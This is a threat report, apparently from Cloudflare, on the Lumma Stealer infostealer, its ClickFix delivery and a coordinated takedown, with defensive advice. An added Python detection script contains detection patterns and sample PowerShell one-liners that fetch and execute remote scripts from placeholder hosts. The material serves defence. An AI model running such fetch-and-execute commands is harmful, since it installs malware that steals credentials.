Threat report - May 21, 2025
Cloudflare’s Cloudforce One and Trust and Safety team participated in a coordinated disruption effort targeting the Lumma Stealer malware operation. Lumma Stealer (also known as LummaC2) is part of a broader class of information-stealing malware that poses a serious threat to both individuals and organizations. By exfiltrating credentials, cryptocurrency wallets, cookies, and other sensitive data from infected machines, Lumma facilitates a wide range of downstream criminal activity, including financial fraud, identity theft, and enterprise breaches that can lead to ransomware. Disrupting this ecosystem is critical to protecting users, undermining the cybercrime economy, and preventing further harm.
Lumma Stealer’s operators attempted to abuse numerous service providers’ infrastructure, including Cloudflare’s, to support their malware operations. Cloudflare detected Lumma Stealer’s abuse and participated in a Microsoft-led disruption effort. As part of this effort, Microsoft collaborated with other private industry partners, both those directly impacted and those providing intelligence and technical support, along with the U.S. Department of Justice, Europol’s European Cybercrime Centre (EC3), and Japan’s Cybercrime Control Center (JC3).
Lumma Stealer is a Malware-as-a-Service (MaaS) offering that allows criminals to rent access to an administrative panel, where they can retrieve stolen data and generate customized builds of the malware payload for distribution to victims worldwide.
Like most other information stealing malware, Lumma Stealer is spread primarily through social engineering campaigns that lure targets into following instructions that result in the download and execution of malware.
The Lumma Stealer disruption effort denies the Lumma operators access to their control panel, marketplace of stolen data, and the Internet infrastructure used to facilitate the collection and management of that data. These actions impose operational and financial costs on both the Lumma operators and their customers, forcing them to rebuild their services on alternative infrastructure.
Lumma Stealer was first advertised on the Russian-language crime forums Exploit and XSS in February 2023. Most of Lumma’s business is now conducted on Telegram, where criminals can purchase access to the admin panel using a variety of cryptocurrencies. Lumma’s original sales thread, as shown below, appeared on crime forums and linked to a website that had been offline for some time prior to the current disruption effort.
Exploit member Shamel posted the original sales thread for LummaC2
The stolen credentials collected by Lumma’s operators, called “logs”, were parsed and indexed for Lumma’s own marketplace where criminals could buy credits with cryptocurrency and search for lucrative credentials. Lumma’s logs were also collected by other criminals who sold access to their collections on Telegram.
The Lumma Market website allows users to search for and purchase stolen credentials
Recent information stealer campaigns typically rely on social engineering rather than the exploitation of a vulnerability. Microsoft and other security researchers have documented a technique known as ClickFix. In this approach, users who visit compromised websites or encounter malicious ads are presented with a deceptive modal popup warning them of an urgent problem with their computer (a broken page, a failed CAPTCHA, a missing codec). The page silently copies a command to the clipboard and instructs the user to press a sequence of keyboard shortcuts (typically Win+R, then Ctrl+V, then Enter) that pastes and runs a PowerShell one-liner. That one-liner fetches and executes a remote script, which in turn downloads and runs a payload such as LummaC2. Because the victim types the commands themselves, no exploit is involved and the launch chain looks like ordinary user activity: explorer.exe spawning powershell.exe.
Lumma’s payloads are typically spread using pay-per-install (PPI) networks or traffic sellers that deliver installs as a service. The price typically depends on the location of the install and on whether the target device is a mobile phone or a desktop computer. Lumma and many other information stealers are often bundled with cracked versions of popular commercial software, targeting users looking to avoid paying for legitimate licenses. To make matters worse, the operators behind LummaC2 invest significant effort in ensuring their malware evades detection by popular antivirus solutions.
Properly defending against Lumma Stealer requires a layered security approach, since it is a fast-evolving infostealer often delivered via malvertising, phishing, or compromised software. Enterprise defenders should carefully restrict access to newly registered domains (NRDs), which LummaC2 uses extensively for payload hosting and command and control. Users outside of an enterprise may consider limiting or preventing the execution of PowerShell and other scripts where it is not required. Enterprise defenders should also consider the following:
Do not permit users to download executable files from untrusted websites
Do not permit users to download or execute scripts or Microsoft Office macros that were downloaded from the Internet, are unsigned, or that are not explicitly allowed by policy
Use reputable endpoint detection and response (EDR) tools that can detect suspicious behaviors, like credential scraping or unauthorized file access
Application allowlisting to prevent unknown executables (including downloaded payloads) from running
Disable PowerShell for non-administrative users, or use Constrained Language Mode to reduce abuse risk
Avoid saving passwords in browsers; use a dedicated password manager instead
Clear autofill data and browser caches regularly
Disable autofill for sensitive information like names, phone numbers, or addresses, especially on corporate machines
Keep browsers, operating systems, and all software up to date to reduce exploitability via known vulnerabilities
Use secure DNS filtering and threat intelligence-based blocklists to prevent connections to NRDs, known C2 servers, malware delivery domains, and Telegram APIs used for data exfiltration
Implement malicious attachment and link detection in email gateways
Deploy browser isolation or sandboxing to reduce the risk of drive-by downloads from malvertising
Educate users about malvertising, fake software installers, and browser scareware tactics like ClickFix, which are common delivery mechanisms
Warn users not to run PowerShell scripts or click on scare popups instructing them to “fix” computer issues
Monitor for unusual outbound connections (especially to Telegram or rare domains)
Monitor for unauthorized credential access from browsers
Monitor for suspicious PowerShell or process spawning activity (e.g., explorer.exe spawning powershell.exe)
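Detection logic for the three monitoring items above and for the ClickFix launch chain described earlier, written as an added example that is not part of the original report or of Cloudflare's tooling. It runs two rule sets over Sysmon-style process-creation (Event ID 1) and DNS-query (Event ID 22) records: explorer.exe spawning powershell.exe with a hidden window, an encoded or policy-bypassing command, or a download cradle (the -EncodedCommand payload is base64-decoded from UTF-16LE and inspected as well), and DNS lookups of Telegram domains or of domains registered within the last 30 days. The sample events, the .example domains, the registration dates, the 30-day cutoff and the indicator regex are all assumptions made for illustration, not indicators from the Threat Events platform.

```python
# Rules over constructed Sysmon-style events: process creation (ID 1) and DNS query (ID 22).
# Every event, domain and registration date below is made up for this example.
import base64
import ntpath
import re
from datetime import date

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Hidden window, encoded/bypass flags or a download cradle: what a ClickFix one-liner needs.
SUSPICIOUS_ARGS = re.compile(
    r"-w(?:indowstyle)?\s+h(?:idden)?\b|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|-e(?:p|xecutionpolicy)\s+bypass|\biwr\b|invoke-webrequest|\biex\b|invoke-expression"
    r"|downloadstring|downloadfile|\bmshta\b|curl\.exe|\bbitsadmin\b", re.IGNORECASE)
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
TELEGRAM_DOMAINS = ("telegram.org", "telegram.me", "t.me")
NRD_MAX_AGE_DAYS = 30  # assumed cutoff for "newly registered"


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_process(ev):
    """Findings [(rule, severity)] for a process-creation event."""
    if ntpath.basename(ev["Image"]).lower() not in POWERSHELL:
        return []
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + " " + decoded  # match on the decoded payload too
    findings = []
    if parent == "explorer.exe":  # Win+R (the ClickFix instruction) runs under explorer.exe
        findings.append(("explorer_spawns_powershell", "medium"))
    if SUSPICIOUS_ARGS.search(text):
        findings.append(("suspicious_powershell_args", "high" if parent == "explorer.exe" else "medium"))
    return findings


def registrable(domain):
    """Last two labels; production code would consult a public-suffix list."""
    return ".".join(domain.split(".")[-2:])


def check_dns(ev, nrd_registered, today):
    """Findings for a DNS-query event: Telegram lookups and newly registered domains."""
    q = ev["QueryName"].lower().rstrip(".")
    findings = []
    if q in TELEGRAM_DOMAINS or q.endswith(tuple("." + d for d in TELEGRAM_DOMAINS)):
        findings.append(("telegram_api_lookup", "high"))
    registered = nrd_registered.get(registrable(q))
    if registered is not None and (today - registered).days <= NRD_MAX_AGE_DAYS:
        findings.append(("newly_registered_domain", "high"))
    return findings


def analyze(events, nrd_registered, today):
    """One dict per finding across all events."""
    out = []
    for i, ev in enumerate(events):
        hits = check_process(ev) if ev["EventID"] == 1 else (
            check_dns(ev, nrd_registered, today) if ev["EventID"] == 22 else [])
        out += [{"index": i, "rule": r, "severity": s, "image": ntpath.basename(ev["Image"])}
                for r, s in hits]
    return out


def encode_ps(script):
    """Build a -EncodedCommand value the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed; .example domains are reserved and never resolve
    {"EventID": 1, "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": 'powershell -w hidden -c "iwr https://cdn-verify.example/fix.ps1 | iex"'},
    {"EventID": 1, "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell -nop -enc " + encode_ps("iex (iwr 'https://update-helper.example/a.ps1')")},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File .\build.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": EXPLORER, "CommandLine": "notepad.exe"},
    {"EventID": 22, "Image": PS, "QueryName": "cdn-verify.example"},
    {"EventID": 22, "Image": r"C:\Users\victim\AppData\Local\Temp\setup.exe", "QueryName": "api.telegram.org"},
    {"EventID": 22, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "QueryName": "login.microsoftonline.com"},
]
NRD_REGISTERED = {"cdn-verify.example": date(2025, 5, 10)}  # assumed WHOIS/RDAP creation dates
TODAY = date(2025, 5, 21)  # report date, used as the reference point


def demo_findings():
    return analyze(SAMPLE_EVENTS, NRD_REGISTERED, TODAY)


if __name__ == "__main__":
    for f in demo_findings():
        print(f"event {f['index']}: {f['severity']:6} {f['rule']} ({f['image']})")
```

The explorer.exe to powershell.exe pair on its own is only medium severity because users legitimately start PowerShell from the Start menu or Run dialog; it is the combination with a hidden window, an encoded command or a download cradle that matches the ClickFix one-liner, so the second rule escalates to high only when the parent is explorer.exe. The benign VS Code build launch and the Outlook lookup of login.microsoftonline.com produce no findings, which is the check worth running before deploying any such rule. The registrable-domain helper takes the last two labels, which is wrong for suffixes like co.uk; a real deployment would use a public-suffix list and a registration-date feed rather than the constructed dictionary here.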
Cloudflare’s services protect its customers’ Internet properties from DDoS and other attacks. Because Cloudflare acts as a reverse proxy in front of the customer’s server, visitors connect to Cloudflare’s IP addresses and the customer’s origin IP address is not exposed to them. Lumma Stealer abused that feature of Cloudflare’s infrastructure to hide the origin IP address of the server that the criminals used to collect files and credentials stolen by the malware. Cloudflare’s Trust and Safety team repeatedly flagged domains used by the criminals and suspended their accounts. In February 2025, Lumma’s malware was observed bypassing Cloudflare’s interstitial warning page, one of the countermeasures Cloudflare employs to disrupt malicious actors. In response, Cloudflare added the Turnstile service to the interstitial warning page so that the malware could no longer bypass it.
The Cloudflare warning interstitial now has Turnstile verification
Cloudflare’s role in the disruption included placing a new, Turnstile-enabled interstitial warning page in front of the malicious actors’ command and control server domains and Lumma’s Marketplace domains, as well as taking action against the accounts that were used to configure the domains. Normally, if a criminal actor abuses Cloudflare’s name servers but did not register the domain through Cloudflare, they can recover control of their domains simply by changing the name server delegation at their registrar. Microsoft coordinated the takedown of Lumma’s domains with the relevant registries in order to ensure that the criminals could not simply change the name servers and recover control.
To learn more about getting access to the list of Lumma Stealer indicators along with additional actionable context, refer to our Threat Events platform, available to Cloudforce One customers.